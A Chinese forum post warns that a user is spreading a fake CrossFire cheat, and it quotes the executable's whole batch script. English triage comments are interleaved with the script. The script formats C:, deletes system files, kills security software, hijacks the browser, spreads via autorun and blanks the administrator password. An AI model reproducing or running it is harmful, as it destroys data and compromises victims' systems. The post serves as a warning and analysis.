关于wj119113
ZxID:15060601
原帖
http://bbs.houdao.com/r5260120/CF 蛤蟆飞天跳舞内存透视稳定版.
恶意发布病毒
请看他的exe文件里面含有的代码
rem Stage 1 of the quoted listing: Explorer restriction values, then a security-tool kill.
rem Each "reg add ... /f" force-writes a REG_DWORD under the current user's
rem Policies\Explorer key. The value names are the standard Explorer restriction
rem names: NoFolderOptions, NoWinKeys, NoFind and NoDesktop are set to 1,
rem NoViewContextMenu is set to 0.
rem NOTE(review): every line spells the key path "SOFTWARW", so the values are
rem created under that literal key. During triage and cleanup, check
rem HKCU\SOFTWARW in addition to the usual HKCU\SOFTWARE policy path.
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
rem The nodrives data is decimal 60 (hex 3C): bits 2 through 5 of the drive-hiding
rem bitmask, which correspond to drive letters C through F.
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
rem Force-terminates (/f) every process whose image name is 360tray.exe,
rem presumably the tray process of the 360 security product - confirm.
rem Detection: a forced taskkill against a security agent's process from a
rem script or an unsigned executable is a high-value alert condition.
taskkill /im 360tray.exe /f
rem Maps drive letter b: and letters h: through z: onto C:\ with subst, so each
rem of those letters becomes an alias of the system drive. subst mappings do not
rem survive a reboot, so they are visible only on a live system (run subst with
rem no arguments to list them).
rem NOTE(review): later statements in this listing loop over drive letters c to z;
rem with these aliases in place those loops would presumably reach C:\ many
rem times over - confirm against the sample.
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
rem The forum poster annotates the next line as "format the C: drive": a quick
rem format (/q) with "y" supplied as the confirmation answer.
rem NOTE(review): the pipe character is caret-escaped as shown, which suggests
rem this text was originally emitted through another layer of the script -
rem confirm against the sample before drawing conclusions about its effect.
echo y^|format C: /q
rem Page extraction fused the lines in this stretch. The dashed Chinese text at
rem the start of each line is the forum poster's annotation for the PREVIOUS
rem command; the command after it on the same line is the next statement of the
rem listing. The annotations, translated in order:
rem   "format the C: drive", "delete important files on C:",
rem   "delete the Registry Editor", "delete the text editor",
rem   "delete the system configuration file",
rem   then "delete important file" four times.
rem The del commands force-delete (/f) win.ini, regedit.exe, Notepad.exe and
rem System.ini, followed by files in the root of C: (bootfront.bin, IO.sys,
rem MSDOS.sys, NTDETECT.COM).
rem NOTE(review): the first four paths are built from a variable named winder,
rem which is not a standard Windows environment variable and is not defined
rem anywhere in the visible listing - TODO confirm how the sample resolves it.
------------------------------格式化C盘del %winder%\win.ini /f
------------------------------删除C盘重要文件del %winder%\regedit.exe /f
------------------------------删除注册表编辑器del %winder%\Notepad.exe /f
------------------------------删除文本编辑器del %winder%\System.ini /f
------------------------------删除系统配置文件del C:\bootfront.bin /f
------------------------------删除重要文件del C:\IO.sys /f
------------------------------删除重要文件del C:\MSDOS.sys /f
------------------------------删除重要文件del C:\NTDETECT.COM /f
rem Browser hijack: the two reg add commands below set the current user's
rem Internet Explorer "Start Page" and "Default_Page_URL" values to the URL
rem shown. The URL sits on its own line because of line wrapping on the page.
rem The domain is an indicator for proxy and DNS hunting and block lists, and
rem both values need to be reset during cleanup.
------------------------------删除重要文件reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d
http://www.5555se.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d
http://www.5555se.com /f
rem Directory flood. alldrive lists drive letters c through z. The nested loop
rem runs a counter from 1 to 2000 and, for each drive letter, calls md to create
rem a root-level directory whose name is three random-number expansions followed
rem by the counter and a trailing "..".
rem The poster reports finding 1997 such folders on one partition and that they
rem could not be deleted in the normal way.
rem NOTE(review): the random-number variable is presumably expanded once when
rem the line is parsed, which would give all folders a shared numeric prefix
rem that is useful for finding them - confirm on an affected system.
rem Cleanup: names ending in dots are normally stripped by the Win32 path layer;
rem removal generally needs rd with the extended-length path prefix.
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,2000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
rem Opens an Explorer window on the root directory.
explorer \
rem Self-copy and drive propagation. The payload file S-1-5-21-1214440339.exe
rem and an autorun.inf are copied from the current directory into the system
rem subdirectory of the Windows directory. If the payload is missing from the
rem current directory it is copied back from there. Both files are then copied
rem to the root of every drive letter from c to z.
rem xcopy switches: /h include hidden and system files, /y no overwrite prompt,
rem /r overwrite read-only files, /k keep file attributes.
xcopy /h /y /r /k .\S-1-5-21-1214440339.exe %systemroot%\system\
xcopy /h /y /r /k .\autorun.inf %systemroot%\system\
@if not exist .\S-1-5-21-1214440339.exe xcopy /h /y /r /k %systemroot%\system\S-1-5-21-1214440339.exe .\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k autorun.inf %%i%:\
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do xcopy /h /y /r /k S-1-5-21-1214440339.exe %%i%:\
rem attrib +h +s +a marks every copy hidden, system and archive, so the files
rem are not shown by Explorer with default view settings.
rem Detection: a root-level autorun.inf next to an executable named like a SID
rem fragment; list with "dir /a" or "attrib" to see hidden plus system files.
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\S-1-5-21-1214440339.exe attrib +h +s +a %%i%:\S-1-5-21-1214440339.exe
for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do @if exist %%i%:\autorun.inf attrib +h +s +a %%i%:\autorun.inf
attrib +h +s +a %systemroot%\system\S-1-5-21-1214440339.exe
attrib +h +s +a %systemroot%\system\autorun.inf
rem Registry persistence. Three .reg files are written with echo, imported
rem silently with regedit /s, then deleted:
rem   reg.reg  - HKLM Winlogon "Userinit" becomes
rem              "userinit.exe,S-1-5-21-1214440339.exe", which adds the payload
rem              to the programs started at logon.
rem   reg1.reg - HKCU Policies\Explorer "NoDriveTypeAutoRun" = dword:95000000.
rem   reg2.reg - HKLM Run value "ctfmon" pointing at the payload in the root of
rem              c:, named after the legitimate ctfmon process.
rem NOTE(review): .reg dword data is hexadecimal, so 95000000 leaves the low
rem byte at 00 - presumably no drive type has AutoRun disabled; confirm.
rem Remediation: Userinit should reference only the system userinit.exe; remove
rem the "ctfmon" Run value and restore NoDriveTypeAutoRun to the baseline.
echo Windows Registry Editor Version 5.00 >> .\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> .\reg.reg
echo "Userinit"="userinit.exe,S-1-5-21-1214440339.exe" >> .\reg.reg
echo Windows Registry Editor Version 5.00 >> .\reg1.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> .\reg1.reg
echo "NoDriveTypeAutoRun"=dword:95000000 >> .\reg1.reg
echo Windows Registry Editor Version 5.00 >> .\reg2.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> .\reg2.reg
echo "ctfmon"="c:\\S-1-5-21-1214440339.exe" >> .\reg2.reg
regedit /s .\reg.reg
regedit /s .\reg1.reg
regedit /s .\reg2.reg
rem The helper files are removed after import, so the registry values above
rem are the durable evidence, not the .reg files.
del .\reg.reg
del .\reg1.reg
del .\reg2.reg
rem Sets the password of the local account named administrator to an empty
rem string. Response: treat the account as exposed, set a new password and
rem review logons that occurred after the sample ran.
net user administrator ""
rem Removes the hidden files shell.vbs and AUTOEXEC.BAT from the current
rem directory (/a:h selects files with the hidden attribute), then deletes the
rem running script itself (argument 0), which removes the dropper from disk.
rem NOTE(review): the digits after "/f" on the last line look like page residue
rem fused onto the command, possibly a counter from the forum page - confirm.
del /a:h .\shell.vbs
del /a:h .\AUTOEXEC.BAT
del %0 /f47616
大家都看到了吧 由于本人也是小菜
我今天晚上做了一次小白 帮大家测试了一下
这个比人的软件 在我的分区中生成1997个文件夹带"."的那种 直接不容易删除的
---------------------------------------------------------------------------------------------------
建议版主 或 管理 把此人ID禁止!!!